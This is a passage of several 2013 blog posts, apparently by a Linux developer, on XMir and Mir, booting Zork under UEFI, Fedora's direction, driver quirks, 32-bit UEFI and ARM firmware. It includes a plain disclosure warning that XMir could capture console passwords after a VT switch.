    There's one corner case where it might still cause problems. Simply running isn't enough - XMir has to make progress through its event loop. That'll only happen if the X server is processing its wakeup events, and it's possible to effectively stall that by submitting a sufficiently awkward drawing request to the server. The X server will appear to freeze, and if the user then attempts to work out what's going on by switching to a VT and logging in, those input events will still be going to XMir. It's left as an exercise to the reader to construct ways to take advantage of this.

    This can't happen in Xorg because the VT switch is blocked until the input devices have been released. Mir could have done the same, but doesn't because of a conscious design decision - in the Ubuntu Phone world, clients stop doing things when they're told to. Ubuntu Desktop is expected to behave the same way.

    This is an unfortunate situation to be in. Ubuntu Desktop was told that they were switching to XMir, but Mir development seems to be driven primarily by the needs of Ubuntu Phone. XMir has to do things that no other Mir client will ever cope with, and unless Mir development takes that into account it's inevitably going to suffer breakage like this. Canonical management needs to resolve this if there's any hope of ever shipping XMir as the default desktop environment.

  • It's still missing features

  • XMir doesn't support colour profiles. XRandR properties aren't exposed, so there's no way to control TV output encoding or overscan. There's still no hardware cursor support. Switching to XMir now would reduce functionality without providing any user-visible gain.


It's clear that XMir has turned into a larger project than Canonical had originally anticipated, but that's hardly surprising. There's only one developer with previous X experience working on it full-time, and the announced schedule provided no opportunity to deal with unexpected problems. As if that weren't enough, there's obvious conflict between Ubuntu Desktop and Ubuntu Phone when it comes to developer time and required functionality. The one hardware vendor who's willing to take a public stand has demonstrated that they have no interest in supporting XMir, despite Canonical assuring people that they were already engaging in productive negotiations with GPU manufacturers.

Multiple monitor support may be the single most obvious feature where XMir is lacking, but it's not the only one. Technically and politically, this code is a long way from being ready for prime time. Without significant community contribution, Canonical need to focus on prioritising it appropriately rather than expecting a tiny number of developers to perform miracles. Or, alternatively, they could just drop XMir entirely and focus on Unity 8.
2013-09-22 14:10
Entry tags:

Implementing UEFI Boot to Zork

One of the earlier examples of students using MIT computer resources to lay the groundwork for a later commercial endeavour, Zork was originally written in a LISP derivative called MDL. This was later tuned into the Zork Implementation Language, a domain specific language that was compiled to target the Z-machine rather than a specific piece of hardware. Combined with machine-specific Z-machine interpreters, this allowed rapid porting of games to a wide range of platforms - the only thing that needed to be rewritten was the interpreter, and that could be reused for any future games running on the same hardware.

Infocom were eventually acquired and killed off, but fan interest in their games continued. New Z-machine interpreters were written in order to allow their games (including Zork) to be run on platforms that Infocom had never targetted. One of the best known is Frotz. This has the advantage of being (a) portable and (b) including a "dumb" UI that makes no assumptions about the availablity of any vaguely useful functionality. Like, say, a Curses library.

So, Frotz seemed like the natural choice when this happened. But despite having a set of functionality that makes it look much more like an OS than a boot environment, UEFI doesn't actually expose a standard C library. The EFI Application Development Kit solves this particular design decision. Porting Frotz ended up involving far more fixing up of Frotz bugs that tripped up -Werror than anything else. One note, though - make sure you include DevShell in the list of required packages at build time, otherwise file i/o will mysteriously fail.

The tying of file i/o to the shell protocol unfortunately means that Frotz can't be directly launched by the firmware. The Boot to Zork images therefore contain a UEFI shell in the standard boot location (\EFI\BOOT\BOOTX64.EFI) which is executed when the firmware attempts to boot the device. The shell then looks for a file called "startup.nsh" in the root directory of the boot device and executes it. Unfortunately this doesn't actually set the shell equivalent of the current device, and so just launching Frotz from startup.nsh fails when Frotz can't open the Zork data file. The solution for this is simple, if ugly - the script walks through the list of devices, looking for one that contains ZORK1.DAT in the root directory. It then changes to that device and launches Frotz. If Frotz exits, it then resets the system.

This could be avoided by doing some more work and turning Frotz into a more UEFI-native application. Teaching Frotz to make native UEFI calls would avoid the requirement for the shell protocols, and the firmware provides a mechanism to obtain the path of the currently running executable which would avoid the need to explicitly locate the device. But I'm lazy and this was a "I'm spending the day on a plane" project initially inspired by a Sazerac-fuelled conversation during the UEFI plugfest, not a demonstration of UEFI best practices.

UEFI Boot To Zork and the source code to the modified Frotz can be downloaded here.

2013-08-22 11:21
Entry tags:

Re: Default offerings, target audiences, and the future of Fedora

Eric (a fellow Fedora board member) has a post describing his vision for what Fedora as an end goal should look like. It's essentially an assertion that since we have no idea who our users are or what they want, we should offer them everything on an equal footing.

Shockingly enough, I disagree.

At the most basic level, the output of different Special Interest Groups is not all equal. We've had issues over the past few releases where various spins have shipped in a broken state, because the SIG responsible for producing them doesn't have the resources to actually test them. We're potentially going to end up shipping F20 with old Bluetooth code because the smaller desktops aren't able to port to the new API in time[1]. Promoting these equally implies that they're equal, and doing so when we know it isn't the case is a disservice to our users.

But it's not just about our users. Before I joined the Fedora project, I'd worked on both Debian and Ubuntu. Debian is broadly similar to the current state of Fedora - no strong idea about what is actually being produced, and a desire among many developers to cater to every user's requirements. Ubuntu's pretty much the direct opposite, with a strongly defined goal and a willingness to sacrifice some use cases in order to achieve that goal.

This leads to an interestingly different social dynamic. Ubuntu contributors know what they're working on. If a change furthers the well-defined aim of the project, that change happens. Moving from Ubuntu to Fedora was a shock to me - there were several rough edges in Fedora that simply couldn't be smoothed out because fixing them for one use case would compromise another use case, and nobody could decide which was more important[2]. It's basically unthinkable that such a situation could arise in Ubuntu, not just because there was a self appointed dictator but because there was an explicit goal and people could prioritise based on that[3].

Bluntly, if you have a well-defined goal, people are more likely to either work towards that goal or go and do something else. If you don't, people will just do whatever they want. The risk of defining that goal is that you'll lose some of your existing contributors, but the benefit is that the existing contributors will be more likely to work together rather than heading off in several different directions.

But perhaps more importantly, having a goal can attract people. Ubuntu's Bug #1 was a solid statement of intent. Being freer than Microsoft wasn't enough. Ubuntu had to be better than Microsoft products on every axis, and joining Ubuntu meant that you were going to be part of that. Now it's been closed and Ubuntu's wandered off into convergence land, and signing up to spend your free time on producing something to help someone sell phones is much less compelling than doing it to produce a product you can give to your friends.

Fedora should be the obvious replacement, but it's not because it's unclear to a casual observer what Fedora actually is. The website proudly leads with a description of Fedora as a fast, stable and powerful operating system, but it's obvious that many of the community don't think of Fedora that way - instead it's a playground to produce a range of niche derivatives, with little consideration as to whether contributing to Fedora in that way benefits the project as a whole. Codifying that would actively harm our ability to produce a compelling product, and in turn reduce our ability to attract new contributors even further.

Which is why I think the current proposal to produce three first-class products is exciting. Offering several different desktops on the download page is confusing. Offering distinct desktop, server and cloud products isn't. It makes it clear to our users what we care about, and in turn that makes it easier for users to be excited about contributing to Fedora. Let's not make the mistake of trying to be all things to all people.

[1] Although clearly in this case the absence of a stable ABI in BlueZ despite it having had a dbus interface for the best part of a decade is a pretty fundamental problem.
[2] See the multi-year argument over default firewall rules and the resulting lack of working SMB browsing or mDNS resolving
[3] To be fair, one of the reasons I was happy to jump ship was because of the increasingly autocratic way Ubuntu was being run. By the end of my involvement, significant technical decisions were being made in internal IRC channels - despite being on the project's Technical Board, I had no idea how or why some significant technical changes were being made. I don't think this is a fundamental outcome of having a well-defined goal, though. A goal defined by the community (or their elected representatives) should function just as well.
2013-08-22 01:55
Entry tags:

If you ever use text VTs, don't run XMir right now

Update: While this isn't strictly fixed (Mir will still perform a VT switch without waiting to ensure that XMir has released the input devices), the time window for console input events to end up in XMir is now small enough that it's probably not a security problem any more.

It'd be easy to assume that in a Mir-based world, the Mir server receives input events and hands them over to Mir clients. In fact, as I described here, XMir uses standard Xorg input drivers and so receives all input events directly. This led to issues like the duplicate mouse pointer seen in earlier versions of XMir - as well as the pointer being drawn by XMir, Mir was drawing its own pointer.

But there's also some more subtle issues. Mir recently gained a fairly simple implementation of VT switching, simply listening for input events where a function key is hit while the ctrl and alt modifiers are set[1]. It then performs the appropriate ioctl on /dev/console and the kernel switches the VT. The problem here is that Mir doesn't tell XMir that this has happened, and so XMir still has all of its input devices open and still pays attention to any input events.

This is pretty easy to demonstrate. Open a terminal or text editor under Xmir and make sure it has focus. Hit ctrl+alt+f1 and log in. Hit ctlr+alt+f7 again. Your username and password will be sitting in the window.

This is Launchpad bug 1192843, filed on the 20th of June. A month and a half later, Mir was added to the main Ubuntu repositories. Towards the bottom, there's a note saying "XMir always listening to keyboard, passwords may appear in other X sessions". This is pretty misleading, since "other X sessions" implies that it's only going to happen if you run multiple X sessions. Regardless, it's a known bug that can potentially leak user passwords.

So it's kind of odd that that's the only mention of it, hidden in a disused toilet behind a "Doesn't work on VESA" sign. If you follow the link to installation instructions you get this page which doesn't mention the problem at all. Now, to be fair, it doesn't mention any of the other problems with Mir either, but the other problems merely result in things not working rather than your password ending up in IRC.

This being developmental software isn't an excuse. There's been plenty of Canonical-led publicity about Mir and people are inevitably going to test it out. The lack of clear and explicit warnings is utterly inexcusable, and these packages shouldn't have landed in the archive until the issue was fixed. This is brutally irresponsible behaviour on the part of Canonical.

So, if you ever switch to a text VT, either make sure you're not running XMir at the moment or make sure that you never leave any kind of network client focused when you switch away from X. And you might want to check IRC and IM logs to make sure you haven't made a mistake already.

[1] One lesser-known feature of X is that the VT switching events are actually configured in the keymap. ctrl+alt+f1 defaults to switching to VT1, but you can remap any key combination to any VT switch event. Except, of course, this is broken in XMir because Mir catches the keystroke and handles it anyway.
2013-08-10 00:23
Entry tags:

When to add a platform-specific quirk to a Linux driver

If you're tempted to add a platform-specific quirk to a Linux driver, pause and do the following:

  1. Check whether the platform works correctly with the generic Windows driver for the hardware in question. If it requires a platform-specific driver rather than the generic one, adding a quirk is probably ok.
  2. If the generic Windows driver works, check whether there's any evidence of platform-specific code in the Windows driver. This will typically be in the .inf file, but occasionally you'll want to run strings against the Windows driver and see whether any functions or strings match the platform in question. If there's evidence of special-casing in the generic Windows driver, adding a quirk is probably ok
  3. If the generic Windows driver works and doesn't appear to have any platform-specific special casing, don't add a quirk. You'll plausibly fix the machine you care about, but you won't fix any others that have the same behaviour. Even worse, if someone does eventually fix the problem properly, there's a risk that your special-casing will now break your system.

The moral to this story is: if you think adding a quirk is the right solution, you're almost certainly wrong.
2013-08-01 01:16
Entry tags:

Don't ship 32-bit UEFI firmware on x86

Shipping a UEFI-bootable Linux distribution is a touch awkward[1], with the main sticking point being the necessity to produce boot media with multiple El-Torito images. An El-Torito image is either an image of a floppy disk or a small hard drive, embedded into the ISO. This allows BIOS systems to look for an El Torito image, hook some interrupts and then boot without the BIOS having to care about the fact that the image is embedded in an ISO-9660 filesystem. UEFI systems will look for an El-Torito image with a special tag - if they find it they'll mount it as a FAT filesystem and look for a bootloader, and if not they'll fall back to BIOS compatibility.

So, if you want a CD that'll boot on both BIOS and UEFI systems, you need two El-Torito images - one for BIOS, one for UEFI. Unfortunately, various BIOSes deal exceptionally badly with CD images that contain more than one El-Torito image. The most common failure case is to print a menu asking you to choose an option without labelling the options, but some will just fail outright. Thankfully, this is pretty much exclusively limited to 32-bit systems.

Things get irritatingly more complicated due to a quirk of UEFI. UEFI is based on executing code in native mode. That means that 32-bit UEFI systems can't execute 64-bit code in firmware, even if the CPU is capable of it. A 64-bit OS can only boot on 32-bit UEFI if it has very ugly compatibility hacks, including having to rewrite structures and register state every time it makes a UEFI call. The only OS I'm aware of that implements this is MacOS X. Having looked into what it'd take to implement it in Linux, I decided that hammering rusty nails through my feet would be a preferable use of time. Thankfully, I went drinking instead.

So distributions have a choice. They can either produce UEFI-bootable CD images for 32-bit x86 and risk failures on actual 32-bit systems, or they can ignore UEFI entirely on 32-bit and succeed in booting on all the hardware that people actually own[2]. Unsurprisingly, they tend to choose the second option.

So, if you're building an x86 hardware platform, don't ship with 32-bit UEFI. If you're stuck with a 32-bit CPU then just ship BIOS. If you have a 64-bit CPU then ship a 64-bit UEFI. If you ship with 32-bit UEFI, no significant existing Linux distribution will support you, and you'll face an uphill battle to convince them to do so.

32-bit UEFI. Just say what on earth were you thinking, please, no, can't you find a solution that doesn't involve me getting tetanus jabs.

(If you're worried about the extra memory consumption of 64-bit OSes, just encourage 32-bit userspace on a 64-bit kernel. Or just boot via BIOS)

[1] See the number that still don't manage it despite having had several years to adapt
[2] Until recently, the only vendor to ship 32-bit UEFI firmware on volume hardware was Apple. This was fine on their 32-bit systems, but on their 64-bit systems with 32-bit UEFI booting a 64-bit version of Windows would result in boot failure. Apple rectified this by stating that 64-bit Windows wasn't supported on platforms with 32-bit UEFI, which is a neat trick if you can manage it. 32-bit Windows (and Linux) was fine because it didn't include a UEFI boot image and so didn't trigger the bug.
2013-07-22 08:51
Entry tags:

ARM and firmware specifications

Jon Masters, Chief ARM Architect at Red Hat, recently posted a description of his expectations for baseline arm64 servers. The quick summary is that systems should implement UEFI and ACPI, and any more traditional ARM boot mechanisms should be ignored. This is an interesting departure from the status quo in the ARM world, and it's worth thinking about the benefits and drawbacks of this approach.

It's very easy to build a generic kernel for most x86 systems, since the PC platform is fairly well defined even if not terribly well specified. Where system hardware does vary, it's almost always exposed on an enumerable bus (such as PCI or USB) which allows the OS to bind appropriate drivers. Things are different in the ARM world. Even once you're past the point of different SoC vendors requiring different kernel setup code and drivers, you still have to cope with the fact that system vendors can wire these SoCs up very differently. Hardware is often attached via GPIO lines without any means to enumerate them. The end result is that you've traditionally needed a different kernel for every ARM board. This is viable if you're selling the OS and hardware as a single product, but less viable if there's any desire to run a generic OS on the hardware.

The solution that's been adopted for this in the Linux world is called Device Tree. Device Tree actually has significant history, having been used as the device descriptor format in Open Firmware. Since there was already support for it in the Linux kernel, adapting it for use in ARM devices was straightforward. Device Tree aware devices can pass a descriptor blob to the kernel at startup[1], and devices without that knowledge can have a blob build into the kernel.

So, if this problem is already solved, why the push to move to UEFI and ACPI? This push didn't actually originate in the Linux world - Microsoft mandate that Windows RT devices implement UEFI and ACPI, and were they to launch a Windows ARM server product would probably carry that over. That makes sense for Microsoft, since recent versions of Windows have been x86 only and so have grown all kinds of support for ACPI and UEFI. Supporting Device Tree would require Microsoft to rewrite large parts of Windows, whereas mandating UEFI and ACPI allowed them to reuse most of their existing Windows boot and driver code. As a result, largely at Microsoft's behest, ACPI 5 has grown a range of additional features for describing things like GPIO pinouts and I2C connections. Whatever your weird device layout, you can probably express it via ACPI.

This argument works less well for Linux. Linux already supports Device Tree, whereas it currently doesn't support ACPI or UEFI on ARM[2]. Hardware vendors are already used to working with Device Tree. Moving to UEFI and ACPI has the potential to uncover a range of exciting new kernel issues and vendor bugs. It's not obviously an engineering win.

So how about users? There's an argument that since server vendors are now mostly shipping ACPI and UEFI systems, having ARM support these technologies makes it easier for customers to replace x86 systems with ARM systems. This really doesn't fly for ACPI, which is entirely invisible to the user. There are no standard ACPI entry points for system configuration, and the bits of ACPI that are generically useful (such as configuring system wakeup times) are already abstracted away to a standard interface by the kernel. It's somewhat more compelling for UEFI. UEFI supports a platform-independent bytecode language (EFI Byte Code, or EBC), which means that customers can write their own system management utilities, build them for EBC and then deploy them to their servers without caring about whether they're x86 or ARM. Want a bootloader that'll hit an internal HTTP server in order to determine which system image to deploy, and which works on both x86 and ARM? Straightforward.

Arnd Bergmann has a interesting counterargument. In a nutshell, ARM servers aren't currently aiming for the same market as x86 servers, and as a result customers are unlikely to gain any significant benefit from shared functionality between the two.

So if there's no real benefit to users, and if there's no benefit to kernel developers, what's the point? The main one that springs to mind is that there is a benefit to distributions. Moving to UEFI means that there's a standard mechanism for distributions to interact with the firmware and configure the bootloader. The traditional ARM approach has been for vendors to ship their own version of u-boot. If that's in flash then it's not much of a problem[3], but if it's on disk then you have to ship a range of different bootloaders and know which one to install (and let's not even talk about initial bootstrapping).

This seems like the most compelling argument. UEFI provides a genuine benefit for distributions, and long term it probably provides some benefit to customers. The question is whether that benefit is worth the flux. The same distribution benefit could be gained by simply mandating a minimum set of u-boot functionality, which would seem much more straightforward. The customer benefit is currently unclear.

In the end it'll probably be a market decision. If Red Hat produce an ARM product that has these requirements, and if Suse produce an ARM product that will work with u-boot and Device Tree, it'll be up to vendors to decide whether the additional work to support UEFI/ACPI is worth it in order to be able to sell to customers who want Red Hat. I expect that large vendors like HP and Dell will probably do it, but the smaller ones may not. The customer demand issue is also going to be unclear until we learn whether using UEFI is something that customers actually care about, rather than a theoretical benefit.

Overall, I'm on the fence as to whether a UEFI requirement is going to stick, and I suspect that the ACPI requirement is tilting at windmills. There's nothing stopping vendors from providing a Device Tree blob from UEFI, and I can't think of any benefits they gain from using ACPI instead. Vendor interest in the generic parts of the ACPI spec has been tepid even in the x86 world (the vast majority of ACPI spec updates come from Microsoft and Intel, not any of the system vendors), and I don't see that changing with the introduction of a range of ARM vendors who are already happy with Device Tree.

We'll see. Linux is going to need to gain the support for UEFI and ACPI on ARM in any case, since there's already hardware shipping in that configuration. But with ARM vendors still getting to grips with Device Tree, forcing them to go through another change in how they do things is going to be hard work. Red Hat may be successful in enforcing these requirements at the cost of some vendor unhappiness, or Red Hat may find that their product doesn't boot on most of the available hardware. It's an aggressive gamble, and while it'll be interesting to see how it plays out, I'm not that optimistic.

[1] The blob could be pulled from the firmware, but it's not uncommon for it to be built into u-boot instead. This does mean that you have a device-specific u-boot even if you have a generic kernel, but that's typically true anyway.
[2] Patches have been posted for ARM UEFI support. They're not mergeable in their current form, but they should be in the near future. ACPI support is in development.
[3] Although not all u-boots are created equal - some vendors ship versions that will only boot off FAT, some vendors ship versions that will only boot off ext2. Having to special case this stuff in your installer is a pain.
2013-07-15 12:09
Entry tags:

How XMir and Mir fit together

Mir is Canonical's new display server. It fulfils a broadly similar role to Wayland and Android's Surfaceflinger, in that it takes final responsibility for getting pixels onto the screen. XMir is an X server that runs on top of Mir. It permits applications that know how to speak the X protocol but don't know how to speak to Mir (ie, approximately all of them at present) to run in a Mir-based environment.

For Ubuntu 13.10, Canonical are proposing to use Mir by default. This doesn't mean that most applications will be using Mir, though - instead, the default session will run XMir as a full-screen client and a normal X environment will be run on that. This lets Canonical deploy Mir without forcing anyone to update their applications, allowing them to take a gradual approach. By 14.10, Canonical expect the default Unity session to be a Mir client rather than an X client. In theory it will then be possible to run an Ubuntu system without any X applications at all, leaving XMir to do nothing other than run legacy applications.

Of course, this requires a certain amount of replumbing. X would normally be responsible for doing things like setting up the screen and pushing the pixels out to the hardware, but this is now handled by Mir instead. Where a native X server would allocate a framebuffer in video memory and render into it, XMir asks Mir for a window corresponding to the size of the screen and renders into that and then simply asks Mir to display it. This step is actually more interesting than it sounds.

Unless you're willing to throw lots of CPU at them, unaccelerated graphics are slow. Even if you are, you're going to end up consuming more power for the same performance, so XMir would be impractical if it didn't provide access to accelerated hardware graphics functions. It makes use of the existing Xorg accelerated X drivers to do this, which is as simple as telling the drivers to render into the window that XMir requested from Mir rather than into the video framebuffer directly. In other words, when displaying through XMir, you're using exactly the same display driver stack as you would be if you were using Xorg. In theory you'd expect identical performance - in practice there's a 10-20% performance hit right now, but that's being actively worked on. Fullscreen 3D apps will also currently take a hit due to there being no support for skipping compositing, which is being fixed. XMir should certainly be capable of performing around as well as native X, but there's no reason for it to be any faster.

The output drivers aren't the only part of the stack. XMir still needs some way to get input events. You might naively expect that Mir would forward input events to XMir, but the current state of affairs is that XMir loads the existing X input drivers which in turn open the input devices themselves. This explains why XMir currently shows two cursors[1] - the first cursor is the Mir cursor that's being driven by the input events Mir is receiving, while the second is the cursor being drawn by XMir in response to the input events that it's receiving[2].

The final main piece of duplicated functionality is output management. In the case where X is its own display server, it can simply ask the kernel to program the outputs. XMir can't do that, so would have to ask Mir to do it instead. Sadly, that functionality's not implemented yet. Running xrandr on Xmir gives:
Screen 0: minimum 320 x 320, current 1366 x 768, maximum 8192 x 8192
XMIR-1 connected primary 1366x768+0+0 (normal left inverted right x axis y axis) 0mm x 0mm
   XMIR mode of death[3]   60.0*+
which translates as "I have a screen that can be any size from 320x320 to 8192x8192, and have one output of unknown physical size that can only display 1366x768 at 60Hz". Other than the 1366x768, the result will be identical no matter how many outputs you have - XMir currently has no support for configuring multiple displays, and will always report 60Hz. It also has no support for placing monitors into any kind of DPMS state.

Obviously, this is still software under active development. There's three months from now until until Ubuntu is due to release with this functionality enabled by default, and the only significant missing features are xrandr and DPMS support. As long as Mir exposes interfaces for controlling those, they shouldn't be a problem to implement. To most users, the transition from native Xorg to XMir should be completely invisible.

Which is kind of the problem. What benefits does the user gain from using XMir on Mir rather than native Xorg?

Features? XMir is a total of around 1000 lines of code on top of Xorg. It implements no functionality that isn't present in Xorg.

Performance? XMir effectively is Xorg - it's the same code running the same drivers. It's not going to be any faster. At the moment it's actually slower, but that's probably fixable.

Security? Again, XMir is effectively Xorg. It still runs as root. It has the same privileges. There's no security benefit to using XMir instead of Xorg.

Like I said, the transition should be completely invisible - no drawbacks, but no benefits. What it does do is get Mir deployed on a larger number of systems, which means Canonical can both get wider testing of the basic Mir functionality and argue that the number of deployed Mir systems means hardware vendors should support it. Users won't see any of the benefits until Unity transitions to being a native Mir client, which is slated for 14.10 next year.

As a PR move, it's pretty great. The public perception is that Mir has gone from not existing to being sufficient to run a full desktop environment in very little time, and it's natural to compare it to Wayland which has been in development for longer and still isn't running a fully featured desktop session. The problem with that perception is that Mir is doing very little at the moment. It's setting an output mode (by asking the kernel to), allocating a window for XMir to draw into and then pushing that window onto the screen whenever XMir tells it that it's changed. This isn't advanced display server functionality, it's the bare minimum that a display server could possibly do[4]. Which is a shame, because Mir is significantly more functional than that, it's just not being used to do anything we couldn't already do.

In summary: XMir on Mir in Ubuntu provides no user benefits and isn't a compelling technology demo. Mir itself will permit a range of additional features, but isn't slated to be running a user session itself until 14.10. The only obvious benefit to Canonical in shipping XMir on Mir is to gain additional testing, which makes using it in 14.04, a supposedly stable and long term release, a somewhat surprising choice.

[1] Although this is in the process of being fixed
[2] This also explains why, on systems with a trackpoint and a touchpad, only the trackpoint moves the Mir cursor while both move the XMir cursor. The X touchpad driver has put the touchpad in absolute mode, which means it's now reporting events that Mir currently ignores.
[3] "XMIR mode of death" is hardcoded into XMir. I'm really hoping it's a Regular Show reference.
[4] So why hasn't anyone done this with Wayland? Mostly because, as described above, there's no technical benefit in doing so. Wayland does have an X server for compatibility purposes, and if you wanted you could run it as a full screen client and run an entire session underneath it. But you'd gain nothing by doing so. The Wayland X server is intended for running individual clients rather than an entire X session. Run an X client under Wayland and it'll pop up in its own individual window and managed by your Wayland session's window manager, just like it would under X. XMir currently has no support for this "rootless" mode - right now if you want to run X apps under Mir, you'll need to launch an entire X session with its own window manager.